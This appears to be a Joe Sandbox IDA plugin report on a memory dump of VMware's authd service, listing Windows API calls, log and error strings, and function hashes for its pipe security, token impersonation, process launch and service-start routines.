                                                    • CreateLogonSessionInfo failed, xrefs: 00ED70F6
                                                    • Could not get session ID of user's token: %d., xrefs: 00ED7527
                                                    • RevertToSelf failed: %d, xrefs: 00ED6E92
                                                    • %s: AllocateAndInitializeSid failed: %u, xrefs: 00ED71F7
                                                    • CreateProcessAsUser failed: %d, xrefs: 00ED74B4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLastfree$CriticalSectionToken$CloseHandleInformation$EnterLeave$AllocateDuplicateEqualFreeImpersonateInitializeLoggedProcessTerminateUser_printfmemcpymemset
                                                    • String ID: %s: AllocateAndInitializeSid failed: %u$%s: SetTokenInformation failed: %u$@$@&!*@*@(msg.authd.termServLaunchFailureWS)Cannot power on the virtual machine. This may be because you are running inside a Terminal Services or Remote Desktop session or are in Fast User Switch Mode.For more information, refer to our Web site at "%s".$After: File_GetNTGlobalFinalPath failed for %s : %d.$Allocating a new session$Before: File_GetNTGlobalFinalPath failed for %s: %d$Could not get session ID of user's token: %d.$CreateLogonSessionInfo failed$CreateProcessAsUser failed: %d$CreateProcessAsUser: The system cannot find the file "%s" (code: %d).$D$DuplcateTokenEx failed: %d.$Failed to validate vmx file "%s", abort to launch it.$GlobalMemoryStatusEx failed: %d$ImpersonateLoggedOnUser failed: %d$Process creation failed$Reusing existing session$RevertToSelf failed: %d$SetProcessWorkingSetSite failed: %d$SetTokenIntegrityLevel$SetTokenIntegrityLevel failed.$Token %x user info query failed (err %d len %d)$`
                                                    • API String ID: 3795865327-499625960
                                                    • Opcode ID: 105d8c1e77241312efaac4b0f58981126416d2e8621c5bb4d645d91da09efa9d
                                                    • Instruction ID: 7ca5e962403a20077c445115eeae723ed40fc004519aeb07db75331aebbb975b
                                                    • Opcode Fuzzy Hash: 105d8c1e77241312efaac4b0f58981126416d2e8621c5bb4d645d91da09efa9d
                                                    • Instruction Fuzzy Hash: 7912E4B09022199FEB219B61ED49BAE77B8EF44304F0410E7F509B2292D7759F85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(00ED45FC,00000001,0000000B,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00ED4892
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,00000001,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED489F
                                                    • InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48CF
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48D9
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48E0
                                                    • FreeSid.ADVAPI32(?), ref: 00ED4A6D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4A78
                                                    • LocalFree.KERNEL32(00000000), ref: 00ED4A86
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4A91
                                                    • ConnectNamedPipe.KERNEL32(00000000,?), ref: 00ED4AC6
                                                    • GetLastError.KERNEL32 ref: 00ED4AD0
                                                    • GetLastError.KERNEL32 ref: 00ED4ADD
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4AE4
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4AA2
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • FreeSid.ADVAPI32(?), ref: 00ED4B14
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4B1B
                                                    • LocalFree.KERNEL32(00000000), ref: 00ED4B25
                                                    Strings
                                                    • InitializeSecurityDescriptor failed: %s (%d) , xrefs: 00ED497F
                                                    • Generated SD is invalid: %s (%d) , xrefs: 00ED49C8
                                                    • SetSecurityDescriptorDacl failed: %s (%d) , xrefs: 00ED49A6
                                                    • Could not add sid to ACL: %s (%d) , xrefs: 00ED4912
                                                    • \\.\pipe\vmware-authdpipe, xrefs: 00ED49F5
                                                    • Generated ACL is invalid: %s (%d) , xrefs: 00ED4934
                                                    • LocalAlloc pSD failed while creating pipe, xrefs: 00ED4951
                                                    • ConnectNamedPipe failed: %s (%d) , xrefs: 00ED4AEA
                                                    • Could not allocate %d bytes for ACL, xrefs: 00ED48B3
                                                    • CreateNamedPipe failed: %s (%d) , xrefs: 00ED4A1A
                                                    • Could not create event for overlapped IO: %s (%d) , xrefs: 00ED4A56
                                                    • Could not initialize ACL: %s (%d) , xrefs: 00ED48E6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FreeWarning$CloseHandleInitializeLocalfree$AllocateConnectNamedPipe_printfcalloc
                                                    • String ID: ConnectNamedPipe failed: %s (%d) $Could not add sid to ACL: %s (%d) $Could not allocate %d bytes for ACL$Could not create event for overlapped IO: %s (%d) $Could not initialize ACL: %s (%d) $CreateNamedPipe failed: %s (%d) $Generated ACL is invalid: %s (%d) $Generated SD is invalid: %s (%d) $InitializeSecurityDescriptor failed: %s (%d) $LocalAlloc pSD failed while creating pipe$SetSecurityDescriptorDacl failed: %s (%d) $\\.\pipe\vmware-authdpipe
                                                    • API String ID: 1190025680-572978193
                                                    • Opcode ID: 15e41d8809b7f19a50d2491026efc852ce52697fc85b88f5d969eef917ea4f0e
                                                    • Instruction ID: 44536319c9b4bcef376f8da0ef3c7f5c93b4882413711e146176883125e4fecb
                                                    • Opcode Fuzzy Hash: 15e41d8809b7f19a50d2491026efc852ce52697fc85b88f5d969eef917ea4f0e
                                                    • Instruction Fuzzy Hash: A681A6B0A41301AFD710AFB1BD4AFAE77A8EF18705F045127F601F63C1EB758A068666
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000020,00000001,00000000), ref: 00ED6871
                                                    • GetCurrentProcess.KERNEL32(?), ref: 00ED689B
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED68A3
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000002), ref: 00ED68B8
                                                    • GetLastError.KERNEL32 ref: 00ED68C2
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00ED6B44
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00ED6B54
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00ED6B76
                                                    • UnloadUserProfile.USERENV(?,?,?,00000000), ref: 00ED6B91
                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00ED6BA1
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001), ref: 00ED6BAF
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • GetLastError.KERNEL32 ref: 00ED6BCE
                                                      • Part of subcall function 00ED2700: Warning.VMWAREBASE(?,00001000,?,00ED6E9C,?,00ED6E9C,RevertToSelf failed: %d,00000000), ref: 00ED273F
                                                    Strings
                                                    • DuplicateHandle failed: %d, xrefs: 00ED68C9
                                                    • (Account %s administrator), xrefs: 00ED6996
                                                    • ImpersonateLoggedOnUser failed: %d, xrefs: 00ED6905
                                                    • CreateEnvironmentBlock(NULL) failed: %d, xrefs: 00ED6A0A
                                                    • GetUserName failed: %d, xrefs: 00ED6948
                                                    • calloc failed, xrefs: 00ED6880
                                                    • The system environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00ED69EF
                                                    • GetEnvironmentStrings() failed: %d, xrefs: 00ED69BC
                                                    • CreateLogonSession: spawn with username: %s, xrefs: 00ED696F
                                                    • is NOT, xrefs: 00ED6988
                                                    • CreateEnvironmentBlock(hToken) failed: %d, xrefs: 00ED6A86
                                                    • Your environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00ED6A6E
                                                    • , xrefs: 00ED68E3
                                                    • RevertToSelf failed: %d, xrefs: 00ED6BD5
                                                    • LoadUserProfile failed: %d, xrefs: 00ED6A37
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$Warning$BlockCurrentDestroyEnvironmentHandleProcessfree$CloseDuplicateProfileUnloadUser_printfcalloc
                                                    • String ID: $ (Account %s administrator)$CreateEnvironmentBlock(NULL) failed: %d$CreateEnvironmentBlock(hToken) failed: %d$CreateLogonSession: spawn with username: %s$DuplicateHandle failed: %d$GetEnvironmentStrings() failed: %d$GetUserName failed: %d$ImpersonateLoggedOnUser failed: %d$LoadUserProfile failed: %d$RevertToSelf failed: %d$The system environment block appears to be corrupted. Please fix your environment block and try again.$Your environment block appears to be corrupted. Please fix your environment block and try again.$calloc failed$is NOT
                                                    • API String ID: 943474365-2635470652
                                                    • Opcode ID: 98c701928ec86d9061b870f3db03153994fed76be6bda50bf5572fac20a05609
                                                    • Instruction ID: 1a222b0bbd8cbc4485c2d2ee08f8feb748e99befc8694bab460a83caf59ec60b
                                                    • Opcode Fuzzy Hash: 98c701928ec86d9061b870f3db03153994fed76be6bda50bf5572fac20a05609
                                                    • Instruction Fuzzy Hash: A5A1C671A013149FDB205F61AC4AB6977B8FF14704F0891ABF945F6381EB718E46CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00000000,?,00000104,?,?), ref: 00ED2E4C
                                                    • Warning.VMWAREBASE(00000000,00000000,?,00000000,?,00000104,?,?), ref: 00ED2E5C
                                                    • GetLastError.KERNEL32(?,?,?,?,?), ref: 00ED2E70
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • WaitForSingleObject.KERNEL32(00000000,00ED17F1,?,?,?,?,?), ref: 00ED2EA0
                                                    • ReleaseMutex.KERNEL32(?), ref: 00ED31B2
                                                    • CloseHandle.KERNEL32(?), ref: 00ED31B9
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED31C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseErrorHandleLastMutexObjectReleaseSingleWaitfree
                                                    • String ID: -fd$Can't create mutex '%s' (%d)$Connect %s$Could not open %s process %d. (error %d)$Error connecting to vmx process.$Global$No such %s process: %s$Start %s$There is no %s process running for config file %s$Timeout acquiring thread lock.$VMAuthdPassFD: DuplicateHandle failed (%d).$VMAuthdPassFD: ImpersonateLoggedOnUser failed (%d).$VMware
                                                    • API String ID: 3389854180-4036884118
                                                    • Opcode ID: 006501ff70b244392cd76cbcf62ce281e00d0252d4f45511501ee4827021ccde
                                                    • Instruction ID: f4884ebb0641396ce8c771a99029a2f073c6d42069b41bed4627c47483ddb472
                                                    • Opcode Fuzzy Hash: 006501ff70b244392cd76cbcf62ce281e00d0252d4f45511501ee4827021ccde
                                                    • Instruction Fuzzy Hash: DDA1B6B1A41219BBDB209B74DC4AFEAB7A8EB14704F0411A7F518B63C1D7709E468F62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • memset.VCRUNTIME140(?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED20D4
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED32A0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118), ref: 00ED32CF
                                                      • Part of subcall function 00ED32A0: GetLastError.KERNEL32(?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED32DC
                                                    • getpeername.WS2_32(?,?,?), ref: 00ED2146
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED214F
                                                    • WSAGetLastError.WS2_32(00000000,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2156
                                                    • Warning.VMWAREBASE(Connect from (local) AF_UNIX socket.,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2172
                                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Connect from (local) AF_UNIX socket.,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED217D
                                                    • inet_ntoa.WS2_32(?), ref: 00ED219C
                                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED21A2
                                                    • htonl.WS2_32(7F000001), ref: 00ED21B6
                                                    • Warning.VMWAREBASE(Connect from local (loopback) socket.,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED21C4
                                                    • htons.WS2_32(?), ref: 00ED21D8
                                                    • getsockname.WS2_32(?,00000001,00000010), ref: 00ED21F5
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED21FE
                                                    • WSAGetLastError.WS2_32(00000000,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2205
                                                    • Warning.VMWAREBASE(Connect from %s socket (%s:%u).,remote,?,vmware-vmx-stats.exe,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED223B
                                                    • Warning.VMWAREBASE(Connect from %.128s,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED224E
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00ED2284
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F33
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F51
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00ED1F76
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$free$CurrentThread_strdup$CreateEvent_printfgetpeernamegetsocknamehtonlhtonsinet_ntoamemset
                                                    • String ID: Connect from %.128s$Connect from %s socket (%s:%u).$Connect from (local) AF_UNIX socket.$Connect from local (loopback) socket.$Failed$Goodbye$NOT_REACHED %s:%d$SSL connection %s$Succeeded$Using plaintext connection$bora\apps\vmauthd\vmauthd.c$getpeername failed: %d tid %d$getsockname failed: %d tid %d$local$remote$security.host.ruissl$start$vmware-vmx-stats.exe
                                                    • API String ID: 988671846-1981099636
                                                    • Opcode ID: 95f0f38bfeefd840f47d6288cb885011788945276ab4a389001197b4383c91b8
                                                    • Instruction ID: f7c7fcedbdfc77be3e9b952e6d242a3df5783ddf5a04a3f353ef8ca0afd99dd8
                                                    • Opcode Fuzzy Hash: 95f0f38bfeefd840f47d6288cb885011788945276ab4a389001197b4383c91b8
                                                    • Instruction Fuzzy Hash: 1A51A6B1E002057EDB1077B09C47BEE76A8EB14704F086167FA04B6392D7756B9787A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,VMAuthdStartService failed to lookup service tag: %s,?,?,?,00000000), ref: 00ED5CEC
                                                    • Warning.VMWAREBASE(00000000,00000000,000F003F,?,?,00000000), ref: 00ED5D10
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00ED5D1C
                                                    • Warning.VMWAREBASE(00000000,?,00000000), ref: 00ED5D23
                                                    • Warning.VMWAREBASE(?,?,OpenSCManager failed: %s (%d),00000000,00000000,?,00000000), ref: 00ED5D35
                                                    • Warning.VMWAREBASE(00000000,00000000,00000014,?,?,00000000), ref: 00ED5D54
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5D62
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5D69
                                                    • Warning.VMWAREBASE(?,?,StartService(%s) failed: %s (%d),00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5D7C
                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5D9C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5DA6
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5DB4
                                                    • GetTickCount.KERNEL32 ref: 00ED5DC2
                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00000000), ref: 00ED5DD1
                                                    • GetTickCount.KERNEL32 ref: 00ED5DEC
                                                    • GetTickCount.KERNEL32 ref: 00ED5E04
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED5E43
                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000), ref: 00ED5E4E
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5E58
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5E5F
                                                    • Warning.VMWAREBASE(?,?,QueryServiceStatus failed: %s (%d),00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5E72
                                                    • Warning.VMWAREBASE(?,?,WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d,?,?,?,?,?,?,00000000), ref: 00ED5EA9
                                                    Strings
                                                    • StartService(%s) failed: %s (%d), xrefs: 00ED5DBB
                                                    • VMAuthdStartService failed to lookup service tag: %s, xrefs: 00ED5CE3
                                                    • OpenService(%s) failed: %s (%d), xrefs: 00ED5D70
                                                    • QueryServiceStatus failed: %s (%d), xrefs: 00ED5E6B
                                                    • VMAuthdStartService failed to start service %s: Expected service state %d, got %d, xrefs: 00ED5E88
                                                    • WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d, xrefs: 00ED5EA2
                                                    • OpenSCManager failed: %s (%d), xrefs: 00ED5D2C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CountServiceTick$QueryStatus$SleepStart
                                                    • String ID: OpenSCManager failed: %s (%d)$OpenService(%s) failed: %s (%d)$QueryServiceStatus failed: %s (%d)$StartService(%s) failed: %s (%d)$VMAuthdStartService failed to lookup service tag: %s$VMAuthdStartService failed to start service %s: Expected service state %d, got %d$WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d
                                                    • API String ID: 91289074-1392791404
                                                    • Opcode ID: adf0ebe94e17e03b482a30d230d7195cbbbb75c327bb64ddb1c3701608d08f24
                                                    • Instruction ID: d032a52aad18f13cc9155599d65895bcd07b964e2cc6952b2d8a1f2837e8c111
                                                    • Opcode Fuzzy Hash: adf0ebe94e17e03b482a30d230d7195cbbbb75c327bb64ddb1c3701608d08f24
                                                    • Instruction Fuzzy Hash: B561F873A00205ABCB10ABA4AC85ABE77AAEB49304F64246BFD05B7351D631DD079B71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,00ED81F3,00000000,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8301
                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED831A
                                                    • Warning.VMWAREBASE(%s: Successfully added access-allowed ACE to file's DACL.,TicketLimitFileAccess,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8436
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8446
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8451
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED845B
                                                    Strings
                                                    • TicketLimitFileAccess, xrefs: 00ED8430
                                                    • %s: malloc error, xrefs: 00ED8329
                                                    • %s: SetFileSecurity error, xrefs: 00ED8422, 00ED8435
                                                    • %s: AddAccessAllowedAce: administator failed, xrefs: 00ED83AC
                                                    • %s: admininistrator SID is not valid., xrefs: 00ED838D
                                                    • %s: SetSecurityDescriptorDacl error, xrefs: 00ED83FB
                                                    • %s: Successfully added access-allowed ACE to file's DACL., xrefs: 00ED842B
                                                    • %s: AllocateAndInitializeSid() failed, xrefs: 00ED8376
                                                    • %s: InitializeSecurityDescriptor error, xrefs: 00ED830B
                                                    • %s: InitializeAcl error, xrefs: 00ED8345
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$DescriptorFreeInitializeSecurityWarningmalloc
                                                    • String ID: %s: AddAccessAllowedAce: administator failed$%s: AllocateAndInitializeSid() failed$%s: InitializeAcl error$%s: InitializeSecurityDescriptor error$%s: SetFileSecurity error$%s: SetSecurityDescriptorDacl error$%s: Successfully added access-allowed ACE to file's DACL.$%s: admininistrator SID is not valid.$%s: malloc error$TicketLimitFileAccess
                                                    • API String ID: 2239919038-1491952532
                                                    • Opcode ID: 450be8c73ef0700c8963cf7a7a51b97a5cf1a1bbb82bb38328ad0a239a20731c
                                                    • Instruction ID: 82718f9b1581f07642c82b18b3df455221579ffffc001f4d0fd084e8c4a309f7
                                                    • Opcode Fuzzy Hash: 450be8c73ef0700c8963cf7a7a51b97a5cf1a1bbb82bb38328ad0a239a20731c
                                                    • Instruction Fuzzy Hash: 7C41D430A45204ABDB118B65AE4ABEE77A8EF14B44F046027F505F6380DB65DA068B66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,00000000), ref: 00ED5F0B
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,?,?,00000000), ref: 00ED5F16
                                                    • strrchr.VCRUNTIME140(?,0000005C,00000000,00000000,00000000,?,?,00000000), ref: 00ED5F25
                                                    • memset.VCRUNTIME140(?,00000000,00000208), ref: 00ED5F8A
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ED5FB1
                                                    • GetLastError.KERNEL32 ref: 00ED5FBD
                                                    • WSCSetApplicationCategory.WS2_32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED5FF1
                                                    • WSCSetApplicationCategory.WS2_32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED6010
                                                    • Warning.VMWAREBASE(%s: WSCSetApplicationCategory succeeded: %#x,VMAuthdRunService,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED6024
                                                    • Warning.VMWAREBASE(%s: WSCSetApplicationCategory Failed: %d,VMAuthdRunService,00000000), ref: 00ED603B
                                                    • WSAStartup.WS2_32(00000002,?), ref: 00ED604C
                                                    • WSAGetLastError.WS2_32 ref: 00ED6057
                                                    • Warning.VMWAREBASE(No usable WinSock DLL. error: %d.,00000000), ref: 00ED6063
                                                    • StartServiceCtrlDispatcherW.ADVAPI32(VMAuthdService), ref: 00ED6084
                                                    • GetLastError.KERNEL32 ref: 00ED6092
                                                    Strings
                                                    Memory Dump Source
